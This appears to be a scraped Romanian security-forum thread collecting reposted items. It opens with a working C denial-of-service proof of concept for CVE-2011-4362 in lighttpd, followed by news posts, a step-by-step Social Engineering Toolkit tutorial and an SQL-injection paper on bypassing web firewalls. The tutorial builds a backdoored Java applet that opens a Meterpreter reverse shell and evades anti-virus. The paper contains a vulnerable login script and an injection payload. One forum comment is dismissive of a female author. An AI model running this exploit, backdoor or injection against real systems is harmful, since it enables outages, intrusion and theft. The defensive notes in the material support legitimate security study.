 *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF
 *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF
 *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF
 *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF
 *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF
 *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF
 * };
 *
 * static unsigned char * base64_decode(buffer *out, const char *in) {
 *         ...
 *         int ch, ...;
 *         size_t i;
 *         ...
 *
 *         ch = in[i];
 *         ...
 *         ch = base64_reverse_table[ch];
 *         ...
 * }
 * --- CUT ---
 *
 * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.
 * (Reviewer note: this holds where plain char is signed; the byte is
 * sign-extended when assigned to the int 'ch'. Converting the byte to
 * unsigned char before using it as the table index keeps the index within
 * 0..255. Per the advisory text above, releases from 1.4.30 on and 1.5 from
 * SVN revision 2806 on are not affected.)
 * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault
 * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata
 * section before the base64_reverse_table table cause this situation.
 *
 * I have added some extra debug in the lighttpd source code to see if this vulnerability is
 * executed correctly. Here is output for one of the example:
 *
 * --- CUT ---
 * ptr[0x9a92c48] size[0xc0] used[0x0]
 * 127(. | 0 | 0)   -128(t | 1 | 0)   -127(e | 2 | 1)   -126(' | 3 | 2)
 * -125(e | 4 | 3)   -124(u | 5 | 3)   -123(r | 6 | 4)   -122(' | 7 | 5)
 * -121(s | 8 | 6)   -120(c | 9 | 6)   -119(i | 10 | 7)   -118(n | 11 | 8)
 * -117(i | 12 | 9)   -116( | 13 | 9)   -115(a | 14 | 10)   -114(t | 15 | 11)
 * -113(. | 16 | 12)   -112(e | 17 | 12)   -111(u | 18 | 13)   -110(r | 19 | 14)
 * -109(' | 20 | 15)   -108(f | 21 | 15)   -107(i | 22 | 16)   -106(e | 23 | 17)
 * -105(: | 24 | 18)   -104(= | 25 | 18)   -103(o | 26 | 19)   -102(t | 27 | 20)
 * -101(o | 28 | 21)   -100( | 29 | 21)   -99(a | 30 | 22)   -98(g | 31 | 23)
 * -97(. | 32 | 24)   -96(d | 33 | 24)   -95(g | 34 | 25)   -94(s | 35 | 26)
 * -93(: | 36 | 27)   -92(u | 37 | 27)   -91(s | 38 | 28)   -90(p | 39 | 29)
 * -89(o | 40 | 30)   -88(t | 41 | 30)   -87(d | 42 | 31)   -86(b | 43 | 32)
 * -85(c | 44 | 33)   -84(e | 45 | 33)   -83(d | 46 | 34)   -82(( | 47 | 35)
 * -81(n | 48 | 36)   -80(y | 49 | 36)   -79(h | 50 | 37)   -78(d | 51 | 38)
 * -77(g | 52 | 39)   -76(s | 53 | 39)   -75( | 54 | 40)   -74(r | 55 | 41)
 * -73(p | 56 | 42)   -72(a | 57 | 42)   -71(n | 58 | 43)   -70(. | 59 | 44)
 * -69(. | 60 | 45)   -68(d | 61 | 45)   -67(g | 62 | 46)   -66(s | 63 | 47)
 * -65(: | 64 | 48)   -64(( | 65 | 48)   -63(d | 66 | 49)   -62(- | 67 | 50)
 * -61(e | 68 | 51)   -60(s | 69 | 51)   -59( | 70 | 52)   -58(i | 71 | 53)
 * -57(s | 72 | 54)   -56(n | 73 | 54)   -55( | 74 | 55)   -54(i | 75 | 56)
 * -53(l | 76 | 57)   -52(. | 77 | 57)   -51(. | 78 | 58)   -50(k | 79 | 59)
 * -49(0 | 80 | 60)   -48(% | 81 | 60)   -47(] | 82 | 61)   -46(p | 83 | 62)
 * -45(r | 84 | 63)   -44(0 | 85 | 63)   -43(% | 86 | 64)   -42(] | 87 | 65)
 * -41(s | 88 | 66)   -40(z | 89 | 66)   -39([ | 90 | 67)   -38(x | 91 | 68)
 * -37(x | 92 | 69)   -36( | 93 | 69)   -35(s | 94 | 70)   -34(d | 95 | 71)
 * -33(0 | 96 | 72)   -32(% | 97 | 72)   -31(] | 98 | 73)   -30(. | 99 | 74)
 * -29(. | 100 | 75)   -28(d | 101 | 75)   -27(c | 102 | 76)   -26(d | 103 | 77)
 * -25(i | 104 | 78)   -24(g | 105 | 78)   -23(b | 106 | 79)   -22(s | 107 | 80)
 * -21(6 | 108 | 81)   -20(- | 109 | 81)   -19(t | 110 | 82)   -18(i | 111 | 83)
 * -17(g | 112 | 84)   -16(f | 113 | 84)   -15(i | 114 | 85)   -14(e | 115 | 86)
 * -13(. | 116 | 87)   -12(. | 117 | 87)   -11(. | 118 | 88)   -10(. | 119 | 89)
 * -9(. | 120 | 90)   -8(. | 121 | 90)   -7(. | 122 | 91)   -6(. | 123 | 92)
 * -5(. | 124 | 93)   -4(. | 125 | 93)   -3(. | 126 | 94)   -2(. | 127 | 95)
 * -1(. | 128 | 96)
 * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]
 * ptr[0x9a92c48] size[0xc0] used[0x60]
 * string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]
 * --- CUT ---
 *
 * First column is the offset so vulnerability is executed like it should be
 * (negative offsets). Second column is byte which is read out-of-bound.
 *
 *
 * Maybe you can find vulnerable binary?
 *
 *
 * Best regards,
 * Adam 'pi3' Zabrocki
 *
 *
 * --
 * http://pi3.com.pl
 * http://site.pi3.com.pl/exp/p_cve-2011-4362.c
 * http://blog.pi3.com.pl/?p=277
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <getopt.h>

#define PORT 80
#define SA struct sockaddr

/* Request template used when the port is 80; it ends inside the value of the
   "Authorization: Basic" header so the credential bytes can be appended. */
char header[] = "GET /%s/ HTTP/1.1\r\n"
                "Host: %s\r\n"
                "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n"
                "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
                "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n"
                "Accept-Encoding: gzip, deflate\r\n"
                "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
                "Proxy-Connection: keep-alive\r\n"
                "Authorization: Basic ";

/* Same template with an explicit port in the Host header. */
char header_port[] = "GET /%s/ HTTP/1.1\r\n"
                     "Host: %s:%d\r\n"
                     "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n"
                     "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
                     "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n"
                     "Accept-Encoding: gzip, deflate\r\n"
                     "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
                     "Proxy-Connection: keep-alive\r\n"
                     "Authorization: Basic ";

/* Builds one HTTP request for an auth-protected directory and sends it over a
   TCP connection. The value of the Basic Authorization header is filled with
   bytes starting at 127 and counting upward, i.e. mostly bytes >= 0x80.
   For detection: the base64 alphabet is pure ASCII, so any byte >= 0x80 in the
   credential part of an "Authorization: Basic" header is invalid and can be
   rejected or alerted on in front of the server; the fixed header set above
   (including the unusual "Proxy-Connection" on a direct request) is a further
   fingerprint of this listing. */
int main(int argc, char *argv[]) {
    int i=PORT,opt=0,sockfd;
    char *remote_dir = NULL;
    char *r_hostname = NULL;
    struct sockaddr_in servaddr;
    struct hostent *h = NULL;
    char *buf;
    unsigned int len = 0x0;

    if (!argv[1])
        usage(argv[0]);

    printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n");
    printf("\n\t\t[+] Preparing arguments... ");

    /* options accepted by the parser: -h <host>, -d <dir>, -p <port> */
    while((opt = getopt(argc,argv,"h:d:p:?")) != -1) {
        switch(opt) {
            case 'h':
                r_hostname = strdup(optarg);
                if ( (h = gethostbyname(r_hostname))==NULL) {
                    printf("Gethostbyname() field!\n");
                    exit(-1);
                }
                break;
            case 'p':
                i=atoi(optarg);
                break;
            case 'd':
                remote_dir = strdup(optarg);
                break;
            case '?':
                usage(argv[0]);
                break;
            default:
                usage(argv[0]);
                break;
        }
    }

    if (!remote_dir || !h) {
        usage(argv[0]);
        exit(-1);
    }

    servaddr.sin_family = AF_INET;
    servaddr.sin_port = htons(i);
    servaddr.sin_addr = *(struct in_addr*)h->h_addr;

    /* template + arguments + 512 bytes of slack for the appended bytes */
    len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;
    if ( (buf = (char *)malloc(len)) == NULL) {
        printf("malloc() \n");
        exit(-1);
    }
    memset(buf,0x0,len);

    if (i != 80)
        snprintf(buf,len,header_port,remote_dir,r_hostname,i);
    else
        snprintf(buf,len,header,remote_dir,r_hostname);

    /* append the credential bytes; the buffer was zeroed, so strlen() finds
       the current end after each store */
    for (i=0;i<130;i++)
        buf[strlen(buf)] = 127+i;

    /* terminate the header block */
    buf[strlen(buf)] = '\r';
    buf[strlen(buf)] = '\n';
    buf[strlen(buf)] = '\r';
    buf[strlen(buf)] = '\n';

    printf("OK\n\t\t[+] Creating socket... ");
    if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {
        printf("Socket() error!\n");
        exit(-1);
    }

    printf("OK\n\t\t[+] Connecting to [%s]... ",r_hostname);
    if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {
        printf("Connect() error!\n");
        exit(-1);
    }

    printf("OK\n\t\t[+] Sending dirty packet... ");
    // write(1,buf,strlen(buf));
    write(sockfd,buf,strlen(buf));

    printf("OK\n\n\t\t[+] Check the website!\n\n");
    close(sockfd);
}

/* Prints the banner and option list, then exits with status 0. */
int usage(char *arg) {
    printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n");
    printf("\n\tUsage: %s <options>\n\n\t\tOptions:\n",arg);
    printf("\t\t\t -v <victim>\n\t\t\t -p <port>\n\t\t\t -d <remote_dir_for_auth>\n\n");
    exit(0);
}
Sursa: Lighttpd 1.4.30 / 1.5 Denial Of Service ? Packet Storm
  5. Lynis Auditing Tool 1.3.0 Authored by Michael Boelen | Site rootkit.nl Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Besides security-related information, it also scans for general system information, installed packages and configuration mistakes. This software aims to assist with automated auditing, software patch management, and vulnerability and malware scanning of Unix-based systems. Changes: Some tests have been extended and a few new ones have been added to this release. There are also improvements to the screen output and logging. Download: http://packetstormsecurity.org/files/download/108164/lynis-1.3.0.tar.gz
  6. Pentagon approved Android to be used by DoD officials The Pentagon has approved a version of Android running on Dell hardware to be used by DoD officials, along with the BlackBerry. The approval of Android by the DoD is a major setback for Apple's iPhone. The military approval is quite specific. Android can only be used on Dell's hardware running Android 2.2. Dell is now offering the Dell Venue, which runs Android 2.2. So, this is the phone which DoD employees can use. The Dell Mobile Security for Android platform has been certified by the Defense Information Systems Agency (DISA) for information assurance and use on defence networks. The Dell Android solution will help the military adapt to today’s operating environment with greater mobility and improved, real-time access to information on the ground. Why did the DoD choose Android? The reason was simple: open source. Stars and Stripes reports, “Android, developed by Google and other companies, is open source software meaning it can be easily configured by users – including DOD tech whizzes who want to install security measures.” Using Apple's iPhone or iOS by government officials is a risk, especially when used by non-American officials. Apple tracks your movement through the built-in GPS chips. Other features include enhanced password protection such as the ability to lock the device down after multiple unsuccessful password entries. Administrators also can remotely control the peripherals and security policy levels on the device, he said. The government-issue Streak 5 also includes DISA-approved security provided by Good Technology’s Mobility Suite. Although the Streak 5 is no longer available commercially, Dell is supplying it to DOD because the military likes the form factor, Marinho said. However, he added that the same capabilities and service can be delivered to other platforms running on Android. Sursa: Pentagon approved Android to be used by DoD officials | The Hacker News (THN)
  7. Nytro

    Malwares

    Safegroup malwares 12.2011/ - 24.12.2011 11:12 11.2011/ - 30.11.2011 07:16 10.2011/ - 01.11.2011 06:30 09.2011/ - 25.09.2011 12:53 wiry do gier/ - 08.09.2011 05:05 06.2011/ - 08.09.2011 12:36 05.2011/ - 08.09.2011 12:27 04.2011/ - 08.09.2011 12:16 03.2011/ - 08.09.2011 12:06 02.2011/ - 07.09.2011 11:58 01.2011/ - 07.09.2011 11:54 exploits/ - 07.09.2011 11:01 ALL_MAL_URLS/ - 07.09.2011 11:00 08.2011/ - 07.09.2011 10:59 07.2011/ - 07.09.2011 10:53 Link: http://malwares.pl/
  8. Nytro: Message to Anonymous - "Muie"
  9. Unde e provocarea? Asta pare mai mult o tema la informatica.
  10. SecurityXploded Ebook Search Exemplu: Showing 1 to 10 out of 2981 results
- CCNA_security.pdf — Size: 33,214 KB, Download Count: 14,500
- Cisco Press - CCNA Security Packet Tracer Manual.pdf — Size: 1,438 KB, Download Count: 7,189
- Network.Security.Bible.Jan.2005.pdf — Size: 12,841 KB, Download Count: 7,171
- CCNA-SECURITY-640.553.pdf — Size: 33,214 KB, Download Count: 6,065
- Sybex CompTIA Security+ Studyguide 3rd Ed.pdf — Size: 10,876 KB, Download Count: 5,843
- CISSP - Certified Information Systems Security Professional Study Guide, Third Edition.pdf — Size: 14,566 KB, Download Count: 5,678
- Damodaran On Valuation Security Analysis for investment and corporate finance.PDF — Size: 29,802 KB, Download Count: 5,637
- CCNA Security Quick Reference.pdf — Size: 4,087 KB, Download Count: 5,064
- Cryptography and Network Security Forouzan.pdf — Size: 50,157 KB, Download Count: 4,301
- Network.Security.Technologies.Second.Edition.pdf — Size: 4,478 KB, Download Count: 3,608
Link: http://securityxploded.com/search-ebooks.php
  11. China Software Developer Network (CSDN) 6 Million user data Leaked Posted by THN Reporter On 12/21/2011 07:33:00 AM The "Chinese Software Developer Network" (CSDN), operated by Bailian Midami Digital Technology Co., Ltd., is one of the biggest networks of software developers in China. A text file with 6 Million CSDN user info including user name, password, emails, all in clear text leaked on internet. The Download Link (use xunlei to download the file) of the File is available on various social Networks. Chinese programmers are now busy changing their passwords. Full archive of 104.9 MB (MD5 = b75678048d100600d3a6c648075636a7) available for Download Now : Here Just did some data mining on CSDN leaked user data. Some interesting findings. Here are the results of Top 100 email providers from 6M CSDN user emails : @qq.com, 1976190 @163.com, 1766919 @126.com, 807893 @sina.com, 351590 @yahoo.com.cn, 205487 @hotmail.com, 202944 Security is important, especially for online service. And NEVER store user passwords in clear text: keep only a salted hash produced by a deliberately slow password-hashing function such as bcrypt, scrypt or PBKDF2, so that a leaked table does not directly expose the passwords. Sursa: China Software Developer Network (CSDN) 6 Million user data Leaked | The Hacker News (THN)
  12. Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers December 22nd, 2011, 14:41 GMT · By Eduard Kovacs Medium severity vulnerabilities are found in Kaspersky Anti-Virus and Kaspersky Internet Security 2011/2012 which can allow an attacker to crash the complete software process. Researchers from Vulnerability Laboratory found a flaw caused by an invalid pointer corruption when processing a corrupt .cfg file through the Kaspersky exception filters. The bug seems to be located in basegui.ppl and basegui.dll when a cfg file import is processed. A proof of concept video was also published along with the disclosure. “The PoC is not affected by the import exception-handling & get through without any problems. A invalid pointer write & read allows a local attacker to crash the software via memory corruption. The technic & software to detect the bug in the binary is prv8,” Benjamin Kunz Mejri, Vulnerability Laboratory founder, wrote. It also seems that a local attacker doesn’t need to know any passwords in order to load the malicious configuration file. According to the timeline report provided by Vulnerability Labs, Kaspersky was notified of the issue in December 2010 and responded a month later. The information on the vulnerabilities was not disclosed until a few days ago, but there is no mention of the bug being fixed. A while back, I had the opportunity to have a chat with Benjamin Kunz Mejri on the security issues they discovered and, at the time, he admitted that not everyone appreciates what they’re doing. “There are 2 options for the product vendor ... he hates us because he cannot see his own flaws/mistakes/fails ... or he loves us because he can now see his flaws/mistakes/fails. Nothing between. The most vendors reply very friendly & ask us for disclosure partnership (cooperation) for future bug publications,” he said. I have contacted Kaspersky to see what they have to say on the matter so stay tuned for an update. 
Sursa: Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers - Softpedia
  13. Untethered jailbreak demonstrated for iOS 5, iOS 5.1 Dec. 22, 2011 (8:25 am) By: Will Shanklin Are you itching for that untethered iOS 5 jailbreak that’s just around the corner? Do you like being teased? If so, you’ll want to check out the video that iOS hacker extraordinaire pod2g has posted. As advertised, it’s a jailbreak and it doesn’t require PC connection after a reboot. The phone in the video is an iPhone 4, not the iPhone 4S. pod2g has also been working on an iOS 5 jailbreak for the A5-running iPad 2 and iPhone 4S, but they’re farther from release. This jailbreak will be for all iOS 5 devices other than those two. That means the iPhone 4, iPhone 3GS, iPod touch 4th generation, and original iPad will be getting in on the untethered action. Most developers hate being pestered for release dates, but pod2g has been generous with progress updates. Last week it sounded like the jailbreak was going through its final days of testing, but he’s had more kinks to work out. He now says that it’s nearly ready for prime time, but also asks for patience, saying that there are “some more days to wait.” An untethered jailbreak for iOS 5 would be a welcomed holiday gift for iOS users. The firmware has been around for a couple of months now. Though it has been jailbreakable from the beginning, it’s a tethered jailbreak, requiring you to connect your device to a PC every time you reboot your device. The untethered jailbreak will remove those chains. As nice as the untethered jailbreak will be, the real prize will be a jailbreak for A5 devices. The iPad 2 and iPhone 4S have thus far proven to be nearly impossible to hack, but pod2g has been making progress on that front too. Last weekend he mentioned that the biggest obstacles were processor cache issues, but he quickly remedied that. The iPhone 4S and iPad 2 jailbreak won’t be released as quickly as the jailbreak in the video, but there’s a good chance pod2g will be releasing it before too long. 
via pod2g Sursa: Untethered jailbreak demonstrated for iOS 5, iOS 5.1 – Cell Phones & Mobile Device Technology News & Updates | Geek.com
  14. Atacuri informatice în 2012: ținte stabilite, război cibernetic, amenințări mobile 22 12 2011 15:39 Corina Cailean Ce ne va aduce 2012 din punct de vedere al securității informatice? În mare, va trebui să ne așteptăm nu doar la o creștere extremă a atacurilor cu ținte specifice asupra instituțiilor de stat și asupra marilor companii, dar este posibil ca din ce în ce mai multe organizații să fie afectate de incidente informatice. Practic, ținta principală a atacatorilor cibernetici o vor constitui guvernele și marile corporații din întreaga lume. Pentru noi, ca simpli utilizatori, „călcâiul lui Ahile” îl vor constitui telefoanele mobile, susțin experții Kaspersky Lab, care au realizat un raport de previziuni pentru anul viitor. Alexander Gostev, autorul raportului „Cyberthreat Forecast for 2012”, susține că, pentru moment, majoritatea incidentelor informatice afectează companiile și organizațiile guvernamentale implicate în fabricarea de armament, operațiuni financiare sau în activități legate de cercetarea în domeniul hi-tech sau în domeniul științei. Anul viitor, vor fi afectate și companiile care activează în domenii ca extracția de resurse naturale, energie, transport, alimentație și farmaceutice. Din punctul de vedere al utilizatorului „casnic”, e important de reținut că printre țintele predilecte se vor număra și companiile care furnizează servicii de Internet, precum și cele care se ocupă cu securitatea informațiilor. Atacurile vor fi mai extinse din punct de vedere geografic anul viitor, incluzând Europa Occidentală și SUA, și vor afecta Europa de Est, Orientul Mijlociu și Asia de Sud-Est. Experții Kaspersky Lab prevăd că infractorii cibernetici își vor schimba metodele de atac, pentru a se adapta la competiția dintre companiile de securitate IT, ce investighează acest tip de atacuri și care oferă protecție împotriva lor. Nivelul crescut de atenție la breșele de securitate va reprezenta încă un motiv pentru care atacatorii vor fi nevoiți să 
caute noi instrumente. Metodele convenționale de atac, ce implică atașamente de e-mail care exploatează vulnerabilitățile din sistem vor deveni din ce în ce mai ineficiente, în timp ce atacurile prin intermediul motoarelor de căutare (influențarea rezultatelor afișate în căutări online pe anumite subiecte) vor fi mult mai populare. O altă previziune este legată de atacurile grupurilor de hackeri activiști asupra organizațiilor de stat și companiilor - care vor continua și în 2012 și vor avea o agendă predominant politică. Cu toate acestea, „hacktivism-ul” ar putea fi utilizat ca o metodă de diversiune pentru a ascunde alte tipuri de atac. Programele de malware hi-tech, cum sunt Stuxnet și Duqu, create cu sprijinul statelor vor rămâne fenomene unice. Apariția lor va fi decisă de tensiunile internaționale dintre anumite țări, iar conflictele în spațiul virtual se vor forma în jurul confruntărilor tradiționale: SUA și Israel împotriva Iranului și SUA și Europa de Vest împotriva Chinei. „Armele” de bază care sunt construite pentru a distruge date într-un anumit moment, cum sunt „kill switches”, bombe logice etc, vor deveni mai populare deoarece sunt mai ușor de fabricat. Crearea acestor programe poate fi externalizată către furnizori privați utilizați de agențiile militare sau guvernamentale. În multe cazuri, este posibil ca furnizorul să nu știe care sunt scopurile clientului. În ceea ce privește amenințările pentru telefoane mobile, Kaspersky Lab se așteaptă ca Google Android să fie ținta favorită pentru piața de software periculos, care atacă terminale mobile, precum și să crească numărul de atacuri ce exploatează vulnerabilități. Este prognozată și apariția primelor atacuri mobile de tip drive-by și a botnet-urilor mobile. Spionajul mobil se va răspândi la scară largă și va include, cel mai probabil, furt de date de pe telefoane mobile și urmărirea anumitor persoane cu ajutorul telefoanelor sau a serviciilor de localizare geografică. 
Sursa: Atacuri informatice în 2012: ținte stabilite, război cibernetic, amenințări mobile PS: E scris de o femeie, nu l-am citit, dar cam asta se propaga prin media.
  15. phpMyAdmin 3.4.9 fixes XSS vulnerabilities 22 December 2011, 12:10 Version 3.4.9 of phpMyAdmin has been released, closing two security holes in the open source database administration tool. The update fixes vulnerabilities in the phpMyAdmin setup interface and the export panels in the server, database and table sections that could be exploited for cross-site scripting (XSS) attacks. All 3.4.x versions up to and including 3.4.8 are affected – upgrading to 3.4.9 corrects the issues. Alternatively, patches are provided. The new release also fixes nine other bugs related to navigation, the user interface and the edit functionality. A full list of changes can be found in the release notes and in the project's security advisories. Version 3.4.9 of phpMyAdmin is available to download from the project's site. Hosted on SourceForge, phpMyAdmin source code is licensed under the GPLv2. See also: XSS in export, a phpMyAdmin security advisory. XSS in setup, a phpMyAdmin security advisory. (crve) Sursa: phpMyAdmin 3.4.9 fixes XSS vulnerabilities - The H Open Source: News and Features
  16. Hardware Involved Software Attacks Jeff Forristal jeff.forristal_@_intel.com Abstract Computer security vulnerabilities involving hardware are under-represented within the security industry. With a growing number of attackers, malware, and researchers moving beyond pure software attack scenarios and into scenarios incorporating a hardware element, it is important to start laying a foundation on how to understand, characterize, and defend against these types of hybrid attacks. This paper introduces and details a starting taxonomy of security attacks called hardware involved software attacks, in an effort to further security community awareness of hardware security and its role in upholding the security of the PC platform. Table of Contents
Preface — 3
PC System Stack: Setting the Stage — 3
Focus on the Hardware Layer — 5
Forced Migration Down the Stack — 6
Hardware Background — 7
How Hardware Facilitates Security Attacks — 8
Obtaining Hardware Access — 8
Taxonomy of Hardware Involved Software Attacks — 9
Inappropriate General Access to Hardware — 10
Unexpected Consequences of Specific Hardware Function — 11
Hardware Reflected Injection — 11
Interference with Hardware Privilege Access Enforcement — 13
Access By a Parallel Executing Entity — 13
External Control of a Hardware Device — 14
Incorrect Hardware Use — 14
Where to Go From Here — 15
Appendix A – Publicized Hardware Vulnerabilities — 15
CVE List of Hardware Involved Software Vulnerabilities — 16
Download: http://www.forristal.com/material/Forristal_Hardware_Involved_Software_Attacks.pdf
  17. Backtrack 5: Penetration Testing with Social Engineering Toolkit Social engineering attacks are one of the top techniques used against networks today. Why spend days, weeks or even months trying to penetrate layers of network security when you can just trick a user into running a file that allows you full access to their machine and bypasses anti-virus, firewalls and many intrusion detection systems? This is most commonly used in phishing attacks today - craft an e-mail, or create a fake website that tricks users into running a malicious file that creates a backdoor into their system. But as a security expert, how could you test this against your network? Would such an attack work, and how could you defend against it? The Backtrack Linux penetration testing platform includes one of the most popular social engineering attack toolkits available. My previous “How-To” on Backtrack 4's SET has been extremely popular. Well, Backtrack 5's SET includes a whole slew of new features and I figured it was time to update the tutorial. We will use SET to create a fake website that offers a backdoored program to any system that connects. So here goes… Okay, timeout for a disclaimer: This is for security testing purposes only, never attempt to use any security checks or tools on a network that you do not have the authorization and written permission to do so. Doing so could cost you your job and you could end up in jail. 1. Obtain Backtrack 5 release 1. You can use the LiveCD version, install it on a new system or run it in a Virtual Machine. 2. The first thing you will want to do is update both the Metasploit Framework and the Social Engineering Toolkit to make sure you have the latest version. Update both, restart SET and check updates one more time. 3. Select number 1, “Social Engineering Attacks” 4. Next select 2, “Website Attack Vectors”. Notice the other options available. 5. Then 1, “Java Applet Attack Method”. 
This will create a Java app that has a backdoor shell in it. 6. Next choose 1, “Web Templates” to have SET create a generic webpage to use. Option 2, “Site Cloner” allows SET to use an existing webpage as a template for the attack webpage. 7. Now choose 1, “Java Required”. Notice the other social media options available. 8. Pick a payload you want delivered, I usually choose 2, “Windows Reverse_TCP Meterpreter”, but you have several to choose from including your own program . Number 13, “ShellCodeExec Alphanum Shellcode” is interesting as it runs from memory, never touching the hard drive, thus effectively by-passing most anti-virus programs. 9. Next choose an encoding type to bypass anti-virus. “Shikata_ga_nai” is very popular, Multi-Encoder uses several encoders, but number 16 is best, “Backdoored Executable”. It adds the backdoor program to a legitimate program, like Calc.exe. 10. Set the port to listen on, I just took the default. Now Backtrack is all set and does several things. It creates the backdoor program, encodes and packs it. Creates the website that you want to use and starts up a listening service looking for people to connect. When done, your screen will look like this: Okay we are all set. Now if we go to a “Victim” machine and surf to the IP address of the “attacker” machine we will see this: If the “Victim” allows this Java script to run, we get a remote session on our attacking machine: You now have access to the victims PC. Use “Sessions -i” and the Session number to connect to the session. Once connected, you can use linux commands to browse the remote PC, or running “shell” will give you a remote windows command shell. That’s it, one bad choice on the victim’s side and security updates and anti-virus means nothing. The “Victim” in this case was a fully updated Windows XP Professional with the top name anti-virus internet security suite installed and updated. 
They can even surf away or close the webpage, because once the shell has connected the web browser is no longer needed. Most attackers will then solidify their hold on the PC and merge the session into another process effectively making the shell disappear. This is why informing your users about the dangers of clicking on unknown links in e-mails, suspicious web links, online anti-virus messages and video codec updates is critical. It can be very hazardous to your network. The easiest way to stop this type of attack is to simply run the FireFox add-in “Noscript”, also BitDefender AV 2012 seems very, very resilient against these types of attacks. Because the delivery shown here depends on the user accepting a Java applet in the browser, disabling or uninstalling the Java browser plug-in on machines that do not need it closes this path regardless of which anti-virus product is installed. Sursa: https://cyberarms.wordpress.com/2011/12/22/backtrack-5-penetration-testing-with-social-engineering-toolkit/
  18. Armitage Hacking Made Easy Part 1 Author : r45c4l Mail : infosecpirate@gmail.com Twitter Greetz and shouts to the entire ICW team and every Indian hackers Introduction When I started writing this, I thought to keep it short and simple as I am assuming that the readers are at least a little bit familiar with Metasploit as well as Armitage. They don't need to know everything, but at least have an idea about the use and purpose of these tools. When I started writing this, I realized that it's really not possible to cover the vast amount of features and the usability of this tool, so I decided to continue this paper in series. I hope to finish this in part 2 of this paper but again it depends on the demands and requests of the readers if they want to add or go into the detail of any of the topic or functions of this beautiful tool “Armitage”. There must be some mistakes so I request readers to please let me know about those mistakes so that I can correct them and give them a better stuff. My contact details are mentioned above. Download: http://www.exploit-db.com/download_pdf/18255
  19. [h=1]False SQL Injection and Advanced Blind SQL Injection[/h] ######################################################################### # # # Exploit Title: False SQL injection and advanced blind SQL injection # # Date: 21/12/2011 # # Author: wh1ant # # Company: trinitysoft # # Group: secuholic # # # # ### ## # # ###### ###### # # ## ## ### ## # # ## ## # # ### ### # # ### ### # # ### # # ### # # ############ ########### # # ############################ # # ############################## # # ############################# # # # ############################ # # # # #### ############ #### # # # # ##### ########## ##### # # # # ###################### ## # # ## #################### ## # # ## ################## ## # # # ## ################ ## # # # # ## ############## ## # # # ## ## ############ ## ## # # ## ## ########## ## ## # # # ## ######## ## # # # ## ###### ## # # ## #### ## # # ## ## ## # # ## ## # # ## ## # # ### ### # # # ######################################################################### This document is written for publicizing of new SQL injection method about detour some web firewall or some security solution. I did test on a web firewall made in Korean, most SQL injection attack was hit, I will not reveal the maker for cutting its damage. In order to read this document, you have to understand basic MySQL principles. I classified the term "SQL Injection" as 2 meanings. The first is a general SQL Injection, we usually call this "True SQL Injection", and the second is a "False SQL Injection". Though in this documentation, you can know something special about "True SQL Injection" And I mean to say it's true that my method (False SQL Injection) is different from True/False SQL Injection mentioned in "Blind SQL Injection". A tested environment was as follow. ubuntu server 11.04 mysql 5.1.54-1 Apache 2.2.17 PHP 5.3.5-1 A tested code was as follow. 
<?php /* create database injection_db; use injection_db; create table users(num int not null, id varchar(30) not null, password varchar(30) not null, primary key(num)); insert into users values(1, 'admin', 'ad1234'); insert into users values(2, 'wh1ant', 'wh1234'); insert into users values(3, 'secuholic', 'se1234'); *** login.php *** */ if(empty($_GET['id']) || empty($_GET['password'])){ echo "<html>"; echo "<body>"; echo "<form name='text' action='login.php' method='get'>"; echo "<h4>ID <input type='text' name='id'><br>"; echo "PASS<input type='password' name='password'><br></h4>"; echo "<input type='submit' value='Login'>"; echo "</form>"; echo "</body>"; echo "</html>"; } else{ $id = $_GET['id']; $password = $_GET['password']; $dbhost = 'localhost'; $dbuser = 'root'; $dbpass = 'pass'; $database = 'injection_db'; $db = mysql_connect($dbhost, $dbuser, $dbpass); mysql_select_db($database,$db); $sql = mysql_query("select * from users where id='$id' and password='$password'") or die (mysql_error()); $row = mysql_fetch_array($sql); if($row[id] && $row[password]){ echo "<font color=#FF0000><h1>"."Login sucess"."</h1></u><br>"; echo "<h3><font color=#000000>"."Hello, "."</u>"; echo "<font color=#D2691E>".$row[id]."</u></h3><br>"; } else{ echo "<script>alert('Login failed');</script>"; } mysql_close($db); } ?> First, basic SQL Injection is as follow. ' or 1=1# The code above is general SQL Injection Code, and this writer classified the code as "True SQL Injection". When you log on to some site, in internal of web program, your id and password are identified by some 